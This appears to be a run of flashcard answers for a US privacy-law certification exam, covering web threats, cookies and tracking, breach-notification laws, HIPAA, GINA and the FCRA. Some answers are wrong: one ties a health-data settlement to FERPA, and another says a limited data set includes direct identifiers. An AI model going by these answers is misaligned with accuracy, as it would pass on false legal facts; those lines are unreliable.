A general term for how attackers can try to persuade a user to provide information or create some other sort of security vulnerability. The social engineer is intent on gaining access to private information and targets an individual or group within an organization that may have such access. Techniques include using an assumed identity in communications, eavesdropping on private conversations or calls, or impersonating an employee or hired worker

Answer 137

A

Structured query language (SQL) injection, cookie poisoning or use of malware. In these attacks, the attacker exploits a technical vulnerability or inserts malicious code.
One technical but common threat to online privacy is XSS. XSS is code injected by malicious web users into web pages viewed by other users. Often, the unauthorized content resulting from XSS appears on a web page and looks official, so the users are tricked into thinking the site is legitimate and uncorrupted. XSS is the basis for many convincing phishing attacks and browser exploits.

Answer 138

A

security practitioners

Answer 139

A

hackers and exploit artists

Answer 140

A

An organization should have a comprehensive defense plan and a procedure in place to effectively address information security threats

Answer 141

A

A standard method for encrypting the transmission of personally identifiable info over the web—including the verification of end user info required for website access
Replaced SSL, which is no longer considered secure
TLS is widely used for handling transmission of sensitive online data such as passwords or bank account numbers between web computers

Answer 142

A

Login/password/PINs
Software
Wireless networks (Wi-Fi)
File sharing

Answer 143

A

Unsolicited commercial email

Answer 144

A

Requires a commercial email to have a clear and conspicuous way for the user to unsubscribe from future emails.
Since the enactment of CAN-SPAM in 2003, commercial companies are required to provide an easy way for users to prevent future emails from that company.
Enforcement actions under CAN-SPAM have resulted in high fines and even jail sentences, pushing spammers to countries outside the US

Answer 145

A

A specialized type of spear phishing that is targeted at C-suite executives, celebrities, and politicians. The aim is the same as spear phishing—to use an email or website to obtain personal and/or sensitive information from the victim

Answer 146

A

Used to describe malicious software that is designed to disrupt or damage a computer, a network or an electronic device, and provide an attacker unauthorized control over a remote computer
As mobile devices become increasingly popular, mobile malware has also become more prevalent
Ex./ viruses, worms, spyware, and ransomware.

Answer 147

A

Software that is downloaded covertly, without the understanding or consent of the end user. Spyware is used to fraudulently collect and use sensitive personal information such as bank account credentials and credit card numbers. Some spyware, for instance, can report each keystroke by a user back to the entity that controls the spyware

Answer 148

A

A type of malware with which the malicious actor either (1) locks a user’s operating system, restricting the user’s access to their data and/or device, or (2) encrypts the data so that the user is prevented from accessing his or her files. As the name implies, the victim is then told to pay a ransom to regain access. For victims who choose to pay the ransom, access may or may not be returned.

Answer 149

A

To protect children’s use of the Internet—particularly websites and services targeted toward children

Answer 150

A

Requires website operators to provide clear and conspicuous notice of the data collection methods employed by the website, including functioning hyperlinks to the website privacy policy on every web page where personal information is collected. It also requires consent by parents prior to collection of personal information for children under the age of 13.

Answer 151

A

Individuals under the age of 18 have the right to request removal of information posted online
Statute prohibits online advertising to minors related to products that these consumers are not legally permitted to buy and also restricts certain online advertising practices based on the minors’ personal info

Answer 152

A

Contains similar categories of restrictions related to advertising to minors (as California’s Privacy Rights for California Minors in the Digital World)

Answer 153

A

Effective date
Scope of notice
Types of personal info collected (both actively and passively)
Info uses and disclosures
Choices available to the end user
Methods for accessing, correcting or modifying personal info or preferences
Methods for contacting the organization or registering a dispute
Processes for how any policy changes will be communicated to the public

Answer 154

A

Say what the organization does and do what is stated
Tailor disclosures to the actual business operations model
Do not treat privacy statements as disclaimers
Revisit the privacy statement frequently to ensure it reflects current business and data collection practices
Communicate these privacy practices to the entire company

Answer 155

A

Trustmarks are images or logos that are displayed on websites to indicate that a business is a member of a professional organization or to show that it has passed security and privacy tests. They are designed to give customers confidence that they can safely engage in e-commerce transactions. TrustArc, Norton and the Better Business Bureau are examples of trustmarks

Answer 156

A

Are a response to problems with a single long notice. The basic idea is to offer “layers” that provide the key points on top in a short notice, but give users the option to read a detailed notice or click through to greater detail on particular parts of the notice

Answer 157

A

The top layer. Often using a standard format, it summarizes the notice scope as well as basic points about the organization’s practices for personal information collection, choice, use and disclosure. Details for contacting the organization on information privacy matters are also included along with links to the full notice.

Answer 158

A

The bottom layer. Often referenced from the short notice via a hyperlink, it is a comprehensive information disclosure that articulates the organization’s privacy notice in its entirety. The full notice is thus available for end users who are interested. The full notice also guides an organization’s employees on permitted data practices and can be used for accountability by enforcement agencies or the general public

Answer 159

A

Privacy by design (or even privacy by default), transparency, and simplification of consumer choices

Answer 160

A

Such access and opportunity for correction should be provided except where:

(i) the burden or expense of doing so would be unreasonable or disproportionate to the risks to the individual’s privacy in the case in question;
(ii) the information should not be disclosed due to legal or security reasons or to protect confidential commercial information; or
(iii) the information privacy of persons other than the individual would be violated.

Answer 161

A

A portion of a web page that contains blank fields, text boxes, check boxes or other input areas that end users complete by providing data (which may or may not include personal information)

Answer 162

A

Used to capture specific pieces of info such as name, city, credit card number or search terms
A label requesting a clear-cut entry is typically present
An important privacy consideration is that limitations should be placed on one-line text boxes to ensure they are used only as intended (e.g., a maximum of 14 characters for a first name)
Failure to set such limits can result in security vulnerabilities

Answer 163

A

Used to capture a sentence or more of text. These are frequently used when an unspecified answer is desired. For instance, a common use is a request for support. Scrolling text boxes should be used with caution since little control exists over what information a user submits

Answer 164

A

Used to collect answers to structured questions. Check boxes allow multiple answers to be selected out of a list of items, while radio buttons limit the user to one answer. Both options are more secure than fields that require the user to type text—the input is limited to the given options, and the content of the answer is not communicated over the web

Answer 165

A

Occurs when the end user deliberately provides information to the website through the use of one of the input mechanisms described above

Answer 166

A

Occurs when information is gathered automatically— often without the end user’s knowledge—as the user navigates from page to page on a website

Answer 167

A

The boundaries between websites are becoming blurred through the emergence of syndicated content, web services, co-branded online ventures, widgets, and online advertising networks

Answer 168

A

Not actually created by the host site, but rather is developed by and/or purchased or licensed from outside sources such as news organizations
One concern with such content is that it might contain malicious code that is then unwittingly incorporated into the organization’s own website source code.
Ex./ XSS allows attackers to inject scripts into web pages for malicious purposes, taking advantage of the trust users have for a given site

Answer 169

A

Facilitate direct communication between computers
They make it possible for organizations to interconnect with their suppliers online, or for users to get content from a site that has contracted with the site the user has selected to visit.

Answer 170

A

Online partnerships between two or more content or service providers. Sharing of information between the partners is often allowed on co-branded sites as long as it is disclosed in the privacy notice

Answer 171

A

Applications that can be installed on a web page, blog, social profile or other HTML page. Typically they are executed by the third party, although they appear on the page itself. The application can be executed by the owner of the page to deliver new website features or increased functionality. Widgets are frequently used as tools or content to make the site more dynamic

Answer 172

A

Connect online advertisers with web publishers that host advertisements on their sites. The networks enable media buyers to coordinate ad campaigns across sites. Through these targeted campaigns, advertisers can reach broad or focused audiences. Ad networks themselves vary in focus and size.

Answer 173

A

Comes from EU law, where processors act on behalf of, and are subject to, the direction of the controller

Answer 174

A

Used for hospitals and other entities covered by HIPAA

Answer 175

A

Used for banks and other financial institutions regulated under The Gramm-Leach-Bliley Act (GLBA)

Answer 176

A

Where other third parties receive data to do their own marketing, or further their other purposes, they become controllers as well.

Ex./ a third party may receive data to conduct a sweepstakes or target marketing to the individuals

In many jurisdictions, including the EU, the original controller remains responsible for proper handling by third parties who receive personal information through onward transfer
In the US, the FTC considers onward transfer to be the responsibility of the host website—not the third party—and has issued guidance and brought enforcement actions toward this end
Onward transfer of EU data by U.S. companies is addressed as part of the Privacy Shield

Answer 177

A

when such transfers occur that (a) their personal information will be in the custody of a third party engaged by the host site and (b) they have the ability to make a choice, typically by opting out, if they desire to prevent the onward transfer

Answer 178

A

Composed of desktop/laptop advertising and mobile advertising. An increasingly large portion of the total digital advertising ecosystem is made up of mobile advertising, and this proportion is projected to continue to grow in the near future.

Answer 179

A

Advertising messages that appear to the end user in a separate browser window in response to browsing behavior or viewing of a site

Answer 180

A

Software that is installed on a user’s computer, often bundled with freeware (free software), such as online games. It monitors the end user’s online behavior so that additional advertising can be targeted to that person based on his or her specific interests and behaviors. Unless there is clear consent by users to this monitoring, however, such adware may be considered spyware by privacy enforcement agencies

Answer 181

A

Term in programming languages for a piece of information shared between cooperating pieces of software
Cookies are widely used on the Internet to enable someone other than the user to link a computing device to previous web actions by the same device
The standard cookie, or HTML, cookie is a small text file that a web server places on the hard drive of a user’s computer
Cookies enable a range of functions, including authentication of web visitors, personalization of content and delivery of targeted advertising

Answer 182

A

Has taken the position that information stored in cookies is generally personal data, so that individual consent is needed before the cookie can be placed on a user’s hard drive

Answer 183

A

Stored only while the user is connected to the particular web server—the cookie is deleted when the user closes the web browser

Answer 184

A

Set to expire at some point in the future, from a few minutes to days or even years from initial delivery. Until expiration, the organization that set the cookie can recognize that it is the same cookie on the same device, and thus often the same user, that earlier visited the website

Answer 185

A

Set and read by the web server hosting the website the user is visiting. For instance, an online retailer or government agency can set a first-party cookie on the hard drive of a user who chooses to visit the retailer’s or agency’s site

Answer 186

A

Set and read by or on behalf of a party other than the web server that is providing a service. (The second party is understood to be the user who is surfing the web.)
Online advertising networks set third-party cookies, as do companies that provide analytics of web usage across sites.
Some websites enable widgets or other software that appears on the first party’s website but interacts with a third party, which may set a third-party cookie

Answer 187

A

Are stored and accessed by Adobe Flash, a browser plug-in historically used by many Internet sites. While online, an individual’s Internet browser collects and stores information from sites visited in the form of cache, or cookies.

Answer 188

A

Aka a web bug, pixel tag or clear GIF
A web beacon is a clear, one-pixel-by-one-pixel graphic image that is delivered through a web browser or HTML-compliant email client application to an end user’s computer—usually as part of a web page request or in an HTML email message, respectively
The web beacon operates as a tag that records an end user’s visit to a particular web page

Answer 189

A

Can identify a device based on information revealed to the website by the user. When a web page is requested, there is no automatic identification of who is seeking to download the content. The web server, though, typically receives certain information connected to the request, and maintains logs, which are used for security and system maintenance purposes.

Answer 190

A

The use of personal information in connection with search engines is important because of the central role search engines perform in determining how people access information on the Internet.
When using cookies or other tracking techniques, the issues concerning search engines are generally similar to those for cookies

Answer 191

A

The use of cookies
- Cookies are used to track the activities of devices as they visit particular web pages, allowing advertisers to build profiles of a device’s online activities; these profiles can then be used to create targeted advertising tailored to the user of that device

Answer 192

A

(1) App-based usage and (2) mobile browser settings.
- In a mobile operating system, each individual application is run in a separate, secure sandbox
- Whereas a mobile browser can use cookies to identify a user across different websites and visits, each mobile app has to create its identifier for a user. This means a single user on three different apps on the same device will appear as three different users

Answer 193

A

Importantly, mobile device tracking is valuable because mobile devices are rarely shared among users. Unlike a traditional desktop or laptop, which may be shared among the various members of a family, mobile devices are rarely shared in the United States. Therefore, once the device is identified, by default, so is the device’s user

Answer 194

A

A tool an advertising tracking company deploys for combining information about each of a user’s devices to track as close to 100 percent of that individual’s history of Internet activity as possible.

Answer 195

A

deterministic tracking, because the identical login provides a basis for determining that it is the same user

Answer 196

A

The protection of information for the purpose of preventing loss, unauthorized access or misuse

Answer 197

A

Confidentiality—access to data is limited to authorized parties
Integrity—assurance that the data is authentic and complete
Availability—knowledge that the data is accessible, as needed, by those who are authorized to use it

Answer 198

A

Are mechanisms put in place to prevent, detect, or correct a security incident.

Answer 199

A

Physical controls—such as locks, security cameras, and fences
Administrative controls—such as incident response procedures and training
Technical controls—such as firewalls, antivirus software, and access logs

Answer 200

A

To “encourage businesses that own or license personal information about Californians to provide reasonable security.” - Specifically, the law requires a business “that owns or licenses personal information about a California resident” to “implement and maintain reasonable security procedures and practices appropriate to the nature of the information, to protect the personal information from unauthorized access, destruction, use, modification, or disclosure.”

Answer 201

A

(1) Social Security number, (2) driver’s license number or California identification card number, (3) financial account number or credit or debit card number “in combination with any required security code, access code or password that would permit access to an individual’s financial account,” (4) medical information, (5) health insurance information, and (6) data collected from automated license plate recognition systems

Answer 202

A

False. New York

Answer 203

A

Massachusetts state security law, 201 CMR 17.00, has generally been considered the most prescriptive in the nation.

Answer 204

A

Designate an individual who is responsible for information security
Anticipate risks to personal information and take appropriate steps to mitigate such risks
Develop security program rules
Impose penalties for violations of the program rules
Prevent access to personal information by former employees
Contractually obligate third-party service providers to maintain similar procedures
Restrict physical access to records containing personal information
Monitor the effectiveness of the security program
Review the program at least once a year and whenever business changes could impact security
Document responses to incidents

Answer 205

A

Permits financial institutions to recover the costs associated with reissuance of credit and debit cards from large processors whose negligence in the handling of credit card data is the proximate cause of the breach.

Answer 206

A

Unintended disclosure—sensitive information posted publicly on a website, mishandled or sent to the wrong party via email, fax or mail
Hacking or malware—electronic entry by an outside party, malware and spyware
Payment card fraud—fraud involving debit and credit cards that is not accomplished via hacking; for example, skimming devices at point-of-service terminals
Insider—someone with legitimate access, such as an employee or contractor, intentionally breaching information
Physical loss—lost, discarded or stolen nonelectronic records such as paper documents;
Portable device—e.g., lost, discarded or stolen laptop, PDA, smartphone, portable memory device, CD, hard drive, data tape
Stationary device—lost, discarded or stolen stationary electronic device such as a computer or server not designed for mobility
Unknown or other

Answer 207

A

Step 1: determining whether a breach has actually occurred
Step 2: containment and analysis of the incident
Step 3: notify affected parties
Step 4: organizations should implement effective follow-up methods

Answer 208

A

Designate the members who will make up a breach response team
Identify applicable privacy compliance documentation
Share information concerning the breach to understand the extent of the breach
Determine what reporting is required
Assess the risk of harm for individuals potentially affected by the breach
Mitigate the risk of harm for individuals potentially affected by the breach
Notify the individuals potentially affected by the breach

Answer 209

A

As of 2017, 48 of the 50 states, the District of Columbia, Puerto Rico and the U.S. Virgin Islands have enacted state breach notification laws

Answer 210

A

An individual’s first name or first initial and last name in combination with any one, or more, of the following data: (1) Social Security number, (2) driver’s license number or state identification card number or (3) account number, credit or debit card number, in combination with any required security code, access code or password that would permit access to an individual’s financial account

Answer 211

A

Idaho, Louisiana and Michigan, which do not include such an exception in their laws

Answer 212

A

Any person who conducts business in this state, and who, in the ordinary course of such person’s business, owns, licenses or maintains computerized data that includes personal information.

Answer 213

A

Georgia law applies only to information brokers. Texas law specifically requires notification to be sent to residents of other states that do not have a similar law requiring notification

Answer 214

A

Unauthorized access to or acquisition of electronic files, media, databases or computerized data containing personal information, when access to the personal information has not been secured by encryption or by any other method or technology that renders the personal information unreadable or unusable

Answer 215

A

There is unauthorized acquisition of the personal information that “compromises the confidentiality, security or integrity” of the information

Answer 216

A

to notify not only Texas residents but also residents of states lacking a data protection notification law

Answer 217

A

A description of the incident in general terms
A description of the type of personal information that was subject to the unauthorized access and acquisition
A description of the general acts of the business to protect the personal information from further unauthorized access
A telephone number for the business that the person may call for further information and assistance, if one exists
Advice that directs the person to remain vigilant by reviewing account statements and monitoring free credit reports
The toll-free numbers and addresses for the major consumer reporting agencies
The toll-free numbers, addresses and website addresses for the FTC Commission and the North Carolina attorney general’s office, along with a statement that the individual can obtain information from these sources about preventing identity theft

Answer 218

A

States generally provide notification options, but a written notice to the data subject is always required first. Telephonic and electronic messages are typical alternatives, but usually only if the data subject has previously explicitly chosen one of those as the preferred communication method

Answer 219

A

Exception allowed by states is for entities subject to other, more stringent data breach notification laws (e.g. HIPAA, GLBA)
Most states allow exceptions for entities that already follow breach notification procedures as part of their own information security policies as long as these are compatible with the requirements of the state law
In most states, a safe harbor exists for data that was encrypted, redacted, unreadable or unusable

Answer 220

A

Process of encoding information so that only the sender and intended recipients can access it. Encryption systems often use a public key, available to the public, and a private key, which allows only the intended recipient to decode the message

Answer 221

A

The Massachusetts Personal Information Security Regulation states that all parties that “own or license” personal information pertaining to Massachusetts residents must encrypt all personal information stored on laptops or other portable devices, as well as wireless transmissions and transmissions sent over public networks

Answer 222

A

As with the California data breach law, the level and type of encryption required is not specified

Later in 2016, California changed its data breach notification law to require notice that a breach occurred related to: (1) both encrypted data and the encryption key or (2) encrypted data when the business has a reasonable belief that the encryption key or security credentials can be obtained by the hacker

Answer 223

A

Tennessee the first state in the country to broadly require notification regardless of whether the information was encrypted

In 2017, Tennessee again amended its statute. The change clarified that encrypted data receives the protection of the safe harbor, unless the encryption key is also acquired in the breach

Answer 224

A

32 states

Answer 225

A

Arizona law applies only to paper records.

Answer 226

A

Requires “shredding, erasing or otherwise modifying the personal identifying information contained in the records to make the personal identifying information unreadable or undecipherable

Answer 227

A

California requires destruction such that records are “unreadable or undecipherable through any means” (emphasis added)

Answer 228

A

Illinois and Utah apply only to government entities

Answer 229

A

Massachusetts stipulates steep penalties of “not more than $100 per data subject affected, provided said fine shall not exceed $50,000 for each instance of improper disposal

Answer 230

A

Consumer reports

Answer 231

A

medical information is related to the inner workings of one’s body or mind. One’s individual sense of self may be violated if others have unfettered access to this information.
most doctors believe that patients will be more open about their medical conditions if they have assurance that embarrassing medical facts will not be revealed.
medical privacy protections can protect employees from the risk of unequal treatment by employers.

Answer 232

A

Scope: covers the disclosure and use of “patient identifying” information by treatment programs for alcohol and substance abuse
Applicability: the law applies to any program that receives federal funding
Disclosure: the program must obtain written patient consent before disclosing information subject to the Rule
Redisclosure: redisclosing information obtained from a program is prohibited when that information would identify, directly or indirectly, an individual as having been diagnosed, treated, or referred for treatment
Security of records: an entity lawfully holding patient-identifying information must have formal policies and procedures in place to protect the security

Answer 233

A

Medical emergencies
Scientific research
Audits and evaluations
Communications with a qualified service organization (QSO) related to information needed by the organization to provide services to the program
Crimes on program premises or against program personnel
Child abuse reporting
Court order

Answer 234

A

The first violation results in a fine of not more than $500. Each subsequent offense is fined not more than $5,000. These violations are reported to the U.S. Attorney’s Office

Answer 235

A

To improve efficiency, HIPAA required entities receiving federal healthcare payments such as Medicare and Medicaid to shift reimbursement requests to electronic formats

Answer 236

A

Defined as any individually identifiable health information that: is transmitted or maintained in any form or medium; is held by a covered entity or its business associate; identifies the individual or offers a reasonable basis for identification; is created or received by a covered entity or an employer; and relates to a past, present or future physical or mental condition, provision of health care or payment for health care to that individual

Answer 237

A

Any PHI that is transmitted or maintained in electronic media (such as computer hard drives, magnetic tapes or disks, or digital memory cards, all of which are considered electronic storage media). Paper records, paper-to-paper fax transmissions, and voice communications (e.g., telephone) are not considered transmissions via electronic media

Answer 238

A

Healthcare providers (e.g., a doctors’ offices, hospitals) that conduct certain transactions in electronic form
Health plans (e.g., health insurers)
Healthcare clearinghouses (e.g., third-party organizations that host, handle or process medical information)

Answer 239

A

It applies to these covered entities, but not to other healthcare providers and services. For instance, some doctors accept only cash or credit cards and do not bill for insurance. They are not covered by HIPAA. More broadly, individuals reveal medical information in a wide variety of settings, ranging from conversations with friends and colleagues, to purchasing books about healthcare, to surfing on healthcare websites and even posting medical information online. These sorts of healthcare information are outside the scope of HIPAA

Answer 240

A

Business associates were not subject to HIPAA but became subject to privacy and security protections under the written contracts they signed with covered entities. Under HITECH, however, HIPAA privacy and security rules are codified and apply directly to business associates

Answer 241

A

Any person or organization, other than a member of a covered entity’s workforce, that performs services and activities for, or on behalf of, a covered entity, if such services or activities involve the use or disclosure of PHI

Answer 242

A

Enter into a business associate agreement (a contract) with that other entity. This contract would include provisions that passed the privacy and security standard down to the contracting entity

Answer 243

A

reasonable, appropriate safeguards to protect PHI (in addition to signing a business associate agreement). As such, covered entities and business associates should implement security practices that, on the whole, comply with the Security Rule.

Answer 244

A

In August 2000, HHS promulgated the regulations on standard electronic formats for healthcare transactions, known as the “Transactions Rule.” This was followed in December 2000 by rules to protect the privacy of personal health information, known as the “Privacy Rule”

Answer 245

A

HIPAA provides perhaps the most detailed implementation of the Fair Information Privacy Practices, including requirements concerning privacy notices, authorizations for use and disclosure of PHI, limits on use and disclosure to the minimum necessary, individual access and accounting rights, security safeguards, and accountability through administrative requirements and enforcement

Answer 246

A

The Privacy Rule generally requires a covered entity to provide a detailed privacy notice at the date of first service delivery

Answer 247

A

A privacy notice does not have to be provided when (1) the healthcare provider has an “indirect treatment relationship” with the patient OR (2) in the case of medical emergencies
The rule is quite specific about elements that must be included in the notice, including detailed statements about individuals’ rights with respect to their PHI

Answer 248

A

Consistent with the statutory goal of improving efficiency in the healthcare system, HIPAA itself authorizes the use and disclosure of PHI for essential healthcare purposes: treatment, payment and operations (collectively, TPO), as well as for certain other established compliance purposes. Other uses or disclosures of PHI require the individual’s opt-in authorization

Answer 249

A

The Privacy Rule requires that covered entities implement administrative, physical and technical safeguards to protect the confidentiality and integrity of all PHI

Answer 250

A

The HIPAA Security Rule requires both covered entities AND business associates to implement administrative, physical and technical safeguards only for ePHI. Like the Privacy Rule, the HIPAA Security Rule aims to prevent unauthorized use or disclosure of PHI. However, the Security Rule also aims to maintain the integrity and availability of ePHI. Accordingly, the Security Rule addresses data backup and disaster recovery, among other related issues

Answer 251

A

The primary enforcer for the Privacy Rule in HHS is the Office of Civil Rights (OCR), which processes individual complaints and can assess civil monetary penalties of up to approximately 1.6 million per year per type of violation, as of the writing of this book

Answer 252

A

WellPoint agreed to pay a civil penalty of $1.7 million in 2013 to settle allegations that it violated HIPAA when it did not adequately implement policies and procedures to protect the ePHI of 612,402 customers

Answer 253

A

In 2016, Feinstein Institute for Medical Research agreed to pay $3.9 million to settle claims that it violated the Family Educational Rights and Privacy Act (FERPA) when the ePHI of 13,000 patients and research participants was stolen in a laptop taken from an employee’s vehicle

Answer 254

A

The U.S. Department of Justice (DOJ) has criminal enforcement authority, with prison sentences of up to 10 years.
For the many companies within its jurisdiction, the FTC can bring enforcement actions for unfair and deceptive practices, even for entities covered by HIPAA
State attorneys general can also bring enforcement for unfair and deceptive practices, or pursuant to any applicable state medical privacy law

Answer 255

A

The rule does not require authorizations for (1) the major categories of treatment, payment and healthcare operations; (2) de-identified information; and (3) medical research

Answer 256

A

The Privacy Rule provides two methods for de-identifying data: (1) remove all of at least 17 data elements listed in the rule, such as name, phone number and address; or (2) have an expert certify that the risk of re-identifying the individuals is very small

Answer 257

A

The Privacy Rule has detailed provisions for how PHI is used for medical research purposes
Research can occur with the consent of the individual, or without consent if an authorized entity such as an institutional review board approves the research as consistent with the Privacy Rule and general rules covering research on human subjects.
Research is permitted on de-identified information, and rules are more flexible if only a limited data set is released to researchers

Answer 258

A

The Privacy Rule contains other exceptions under which PHI may be used without consent.

information used for public health activities;
to report victims of abuse, neglect or domestic violence;
in judicial and administrative proceedings;
for certain law enforcement activities; and
for certain specialized governmental functions

Answer 259

A

Establishes minimum security requirements for PHI that a covered entity receives, creates, maintains or transmits in electronic form
Designed to require covered entities to implement “reasonable” security measures in a technology-neutral manner
Goal: all covered entities to implement “policies and procedures to prevent, detect, contain, and correct security violations.

Answer 260

A

The Security Rule is comprised of “standards” and “implementation specifications,” which encompass administrative, technical and physical safeguards. Some of the implementation specifications are required, while others are considered “addressable”

Answer 261

A

Ensure the confidentiality, integrity and availability of all ePHI the covered entity creates, receives, maintains or transmits
Protect against any reasonably anticipated threats or hazards to the security or integrity of the ePHI
Protect against any reasonably anticipated uses or disclosures of such information that are not permitted or required under the Privacy Rule
Ensure compliance with the Security Rule by its workforce

Answer 262

A

The size, complexity and capabilities of the covered entity
The covered entity’s technical infrastructure, hardware and software security capabilities
The costs of security measures
The probability and criticality of potential risks to electronic protected health information

Answer 263

A

It is important to remember that HIPAA does not preempt state laws that provide more protection than the federal law

Answer 264

A

(1) additional patient rights,
(2) added uses or disclosures for PHI, and
(3) shortened deadlines for action

Answer 265

A

HITECH was enacted as part of the American Recovery and Reinvestment Act of 2009 to promote the adoption and meaningful use of health information technology

Answer 266

A

In the event of unauthorized acquisition, access, use or disclosure of information, a breach is presumed to have occurred, unless the covered entity demonstrates through a risk assessment that there is a low probability that the security or privacy of the information has been compromised

Answer 267

A

HHS has issued a final rule pursuant to HITECH that allows for penalties of up to $1.5 million for the most willful violations and extends criminal liability to individuals who misuse PHI.
The enforcement rules provide for penalties even if the covered entity did not know of the violation

Answer 268

A

All disclosures by a covered entity should attempt to comply with the definition of a limited data set, and if this is not feasible, data disclosed must be the minimum amount necessary. The term limited data set refers to protected health information that includes direct identifiers of the individual.

Answer 269

A

The $19 billion in funding in HITECH created important incentives for health providers to use Electronic Health Records (EHRs) more extensively. Providers who make “meaningful use” of EHRs can qualify for these funds.

Answer 270

A

Prohibits health insurance companies from discriminating on the basis of genetic predispositions in the absence of manifest symptoms or from requesting that applicants receive genetic testing, and prohibits employers from using genetic information in making employment decisions

Answer 271

A

GINA amended a variety of existing pieces of legislation including, among others, the Employee Retirement Income Security Act (ERISA), the Social Security Act and the Civil Rights Act

Answer 272

A

adjusting premiums or other contribution schemes on the basis of genetic information, absent a manifestation of a disease or disorder

Answer 273

A

requesting or requiring genetic testing in connection with the offering of group health plans, although an exception is carved out for requests for voluntary testing in connection with research

Answer 274

A

Apply to participants in the individual health insurance market to prohibit adjustments to premiums or other contribution schemes on the basis of genetic information absent the manifestation of disease or disorder.

Answer 275

A

GINA also directs the secretary of HHS to revise HIPAA regulations such that genetic information is considered health information, and the disclosure of such information may not be disclosed by covered entities, pursuant to HIPAA

Answer 276

A

Aside from health care insurance, GINA also takes aim at the possibility of employment discrimination based on genetic information in the absence of the manifestation of a disease or disorder

Answer 277

A

Along with expressly prohibiting discrimination on the basis of genetic information, these portions of GINA prohibit employers from requiring, requesting or purchasing such genetic information about employees or family members unless an express exception applies

Answer 278

A

(1) such a request is inadvertent,
(2) the request is part of an employer-offered wellness program that the employee voluntarily participates in with written authorization,
(3) the request is made to comply with the Family and Medical Leave Act of 1993,
(4) an employer purchases commercially and publicly available materials that include the information,
(5) the information is used for legally required genetic monitoring for toxin exposure in the workplace if the employee voluntarily participates with written authorization or
(6) the employer conducts DNA analysis for law enforcement purposes and requests the information for quality-control purposes (i.e., to identify contamination)

Answer 279

A

GINA itself does not provide for a private right of action, but—depending on the violation—private rights of action may be available under the federal laws that it revises, as well as under similar state laws

Answer 280

A

The purpose of the 21st Century Cures Act (“Cures Act”) is to expedite the research process for new medical devices and prescription drugs, quicken the process for drug approval, and reform mental health treatment

Answer 281

A

The Cures Act has numerous privacy-related provisions, and seeks a balance between the protection of personal data and the public interest in the appropriate utilization of this information

Answer 282

A

Certain individual biomedical research information exempted from disclosure under Freedom of Information Act
Researchers permitted to remotely view PHI
Information blocking prohibited but HIPAA’s protection of PHI remains
“Certificates of confidentiality” for research”
“Compassionate” sharing of mental health or substance abuse information with family or caregivers”

Answer 283

A

The Fair Credit Reporting Act (FCRA) was enacted in 1970 to regulate the consumer reporting industry and provide privacy rights in consumer reports.

The origins of the FCRA can be traced to the rise of consumer credit in the United States. In the post-World War II era, merchants began to share more in-depth customer data in order to facilitate lending to households. By the 1960s, consumer credit was critical, but increasingly, individuals were being harmed by inaccurate information that they could neither see nor correct. In response, Congress passed the FCRA, the first federal law to regulate the use of personal information by private businesses

Answer 284

A

The FCRA regulates any “consumer reporting agency” (CRA) that furnishes a “consumer report,” which is used primarily for assisting in establishing consumer’s eligibility for credit

Answer 285

A

A CRA is any person or entity that compiles or evaluates personal information for the purpose of furnishing consumer reports to third parties for a fee

Answer 286

A

Three well-known examples of CRAs are Experian, Equifax and TransUnion, which are leading providers of credit information and credit scores

Answer 287

A

Creditworthiness
Credit standing
Credit capacity
Character
General reputation
Personal characteristics
Mode of living

Answer 288

A

Third-party data for substantive decision making must be appropriately accurate, current and complete
Consumers must receive notice when third-party data is used to make adverse decisions about them
Consumer reports may be used only for permissible purposes
Consumers must have access to their consumer reports and an opportunity to dispute them or correct any errors

Answer 289

A

(1) dispute resolution, (2) private litigation, and (3) government actions.

The dispute resolution infrastructure permits the consumer to fill a request with the CRA to dispute the accuracy of information, and then requires the CRA to investigate the consumer’s complaint

Answer 290

A

Noncompliance with the FCRA can lead to civil and criminal penalties. In addition to actual damages, as of the writing of this book, violators are subject to statutory damages of at least $1,000 per violation, and at least $3,756 for willful violations

Answer 291

A

FTC, the CFPB, and state attorneys general

Answer 292

A

The state attorneys general are required to give notice to the FTC prior to filing suit and the FTC retains the authority to intervene in the cases brought by the state attorneys general

Answer 293

A

In 2014 TeleCheck Services (large check authorization service company) and TRS Recovery Services (associated debt-collection company) agreed to pay $3.5 million to settle FTC charges for FCRA violations.
FTC alleged that TeleCheck, a CRA, did not comply w/ dispute procedures for consumers whose checks were denied based on info provided by the business
TRS, a company that handles consumer debt taken on by TeleCheck, was alleged to have violated requirements of the FTC’s Furnisher Rule, which requires entities furnishing info to CRAs to ensure the accuracy and integrity of the info provided.
The settlement was part of a broader initiative by the FTC to target the practices of data brokers that sell info to companies making decisions about consumers

Answer 294

A

An example of CFPB enforcement
The CFPB alleged that Clarity failed to properly investigate consumers who attempted to dispute info on their credit reports and obtained credit reports w/o a permissible purpose
As a result, Clarity Services agreed to pay an $8 million civil penalty

Answer 295

A

Users must have a “permissible purpose”
Users must provide certifications
Users must notify consumers when adverse actions are taken

Answer 296

A

As ordered by a court or a federal grand jury subpoena
As instructed by the consumer in writing
For the extension of credit as a result of an application from a consumer, or the review or collection of a consumer’s account
For employment purposes, including hiring and promotion decisions, where the consumer has given written permission
For the underwriting of insurance as a result of an application from a consumer
When there is a legitimate business need, in connection with a business transaction that is initiated by the consumer
To review a consumer’s account to determine whether the consumer continues to meet the terms of the account
To determine a consumer’s eligibility for a license or other benefit granted by a governmental
“instrumentality required by law to consider an applicant’s financial responsibility or status
For use by a potential investor or servicer, or current insurer, in a valuation or assessment of the credit or prepayment risks associated with an existing credit obligation
For use by state and local officials in connection with the determination of child support payments, or modifications and enforcement thereof
In addition, creditors and insurers may obtain certain consumer report information for the purpose of making “prescreened” unsolicited offers of credit or insurance”

Answer 297

A

Section 604(f) of the FCRA prohibits any person from obtaining a consumer report from a CRA unless the person has certified to the CRA the permissible purpose(s) for which the report is being obtained and certifies that the report will not be used for any other purpose.

Answer 298

A

The term adverse action is defined very broadly to include all business, credit and employment actions affecting consumers that can be considered to have a negative impact, such as denying or canceling credit or insurance, or denying employment or promotion. No adverse action occurs in a credit transaction where the creditor makes a counteroffer that is accepted by the consumer

Answer 299

A

Adverse actions based on information obtained from a CRA
Adverse actions based on information obtained from third parties that are not consumer reporting agencies
Adverse actions based on information obtained from affiliates

Answer 300

A

The FCRA requires disclosure by all persons who use credit scores in making or arranging loans secured by residential real property

Answer 301

A

Make a clear and conspicuous written notification to the consumer before the report is obtained, in a document that consists solely of the disclosure that a consumer report may be obtained by the employer.
Obtain prior written consumer authorization in order to obtain a consumer report. Authorization to access reports during the term of employment may be obtained at the time of employment.
